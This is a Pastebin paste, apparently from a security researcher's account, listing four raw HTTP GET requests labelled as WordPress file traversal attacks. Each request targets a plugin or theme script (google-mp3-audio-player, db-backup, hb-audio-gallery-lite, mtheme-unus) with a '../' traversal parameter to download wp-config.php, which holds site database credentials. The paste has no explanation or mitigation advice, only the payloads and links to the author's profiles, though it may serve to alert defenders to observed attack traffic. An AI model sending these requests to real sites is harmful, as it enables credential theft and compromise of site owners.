Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Wordpress file traversal attacks
- ***********
- GET/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
- Content-Type: application/x-www-form-urlencoded
- Accept: */*
- Host: www.mywebsite.com
- Accept-Encoding: gzip, deflate
- Connection: Keep-Alive
- GET/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
- Content-Type: application/x-www-form-urlencoded
- Accept: */*
- Host: www.mywebsite.com
- Accept-Encoding: gzip, deflate
- Connection: Keep-Alive
- GET/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
- Content-Type: application/x-www-form-urlencoded
- Accept: */*
- Host: www.mywebsite.com
- Accept-Encoding: gzip, deflate
- Connection: Keep-Alive
- GET/wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
- Content-Type: application/x-www-form-urlencoded
- Accept: */*
- Host: www.mywebsite.com
- Accept-Encoding: gzip, deflate
- Connection: Keep-Alive
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment